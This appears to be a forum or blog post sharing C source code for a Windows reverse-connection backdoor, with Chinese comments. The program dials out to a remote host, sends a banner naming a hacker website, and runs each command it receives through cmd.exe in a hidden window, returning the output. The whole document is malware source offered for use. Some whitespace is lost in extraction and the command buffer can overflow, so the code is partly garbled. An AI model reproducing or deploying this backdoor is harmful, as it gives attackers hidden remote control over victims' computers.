反向连接后门源码

#include < winsock2.h >
#include < stdio.h >

#pragma comment(lib,"ws2_32.lib")

void main( int argc, char ** argv)
{
char * messages = " ========================BackConnectBackDoorV0.1======================== =========WelcometoHttp://www.hackerxfiles.net========= " ;
WSADATAWSAData;
SOCKETsock;
SOCKADDR_INaddr_in;
char buf1[ 1024 ]; // 作为socket接收数据的缓冲区
memset(buf1, 0 , 1024 ); // 清空缓冲区

if (WSAStartup(MAKEWORD( 2 , 0 ), & WSAData) != 0 )
{
printf( " WSAStartuperror.Error:d " ,WSAGetLastError());
return ;
}

addr_in.sin_family = AF_INET;
addr_in.sin_port = htons( 80 ); // 反向连接的远端主机端口
addr_in.sin_addr.S_un.S_addr = inet_addr( " 127.0.0.1 " ); // 远端IP

if ((sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) == INVALID_SOCKET)
{
printf( " Socketfailed.Error:d " ,WSAGetLastError());
return ;
}
if (WSAConnect(sock,( struct sockaddr * ) & addr_in, sizeof (addr_in),NULL,NULL,NULL,NULL) == SOCKET_ERROR) // 连接客户主机
{
printf( " Connectfailed.Error:d " ,WSAGetLastError());
return ;
}

if (send(sock,messages,strlen(messages), 0 ) == SOCKET_ERROR) // 发送欢迎信息
{
printf( " Sendfailed.Error:d " ,WSAGetLastError());
return ;
}

char buffer[ 2048 ] = { 0 }; // 管道输出的数据

for ( char cmdline[ 270 ];;memset(cmdline, 0 , sizeof (cmdline))){
SECURITY_ATTRIBUTESsa; // 创建匿名管道用于取得cmd的命令输出
HANDLEhRead,hWrite;
sa.nLength = sizeof (SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if ( ! CreatePipe( & hRead, & hWrite, & sa, 0 ))
{
printf( " ErrorOnCreatePipe() " );
return ;
}

STARTUPINFOsi;
PROCESS_INFORMATIONpi;
si.cb = sizeof (STARTUPINFO);
GetStartupInfo( & si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

GetSystemDirectory(cmdline,MAX_PATH + 1 );
strcat(cmdline, " \cmd.exe/c " );

int len = recv(sock,buf1, 1024 ,NULL);
if (len == SOCKET_ERROR)exit( 0 ); // 如果客户端断开连接，则自动退出程序
if (len <= 1 ){send(sock, " error " , sizeof ( " error " ), 0 ); continue ;}


strncat(cmdline,buf1,strlen(buf1)); // 把命令参数复制到cmdline
if ( ! CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL, & si, & pi))
{
send(sock, " Errorcommand " , sizeof ( " Errorcommand " ), 0 );
continue ;
}

CloseHandle(hWrite);
// 循环读取管道中数据并发送，直到管道中没有数据为止
for (DWORDbytesRead;ReadFile(hRead,buffer, 2048 , & bytesRead,NULL);memset(buffer, 0 , 2048 )){
send(sock,buffer,strlen(buffer), 0 );
}
}

}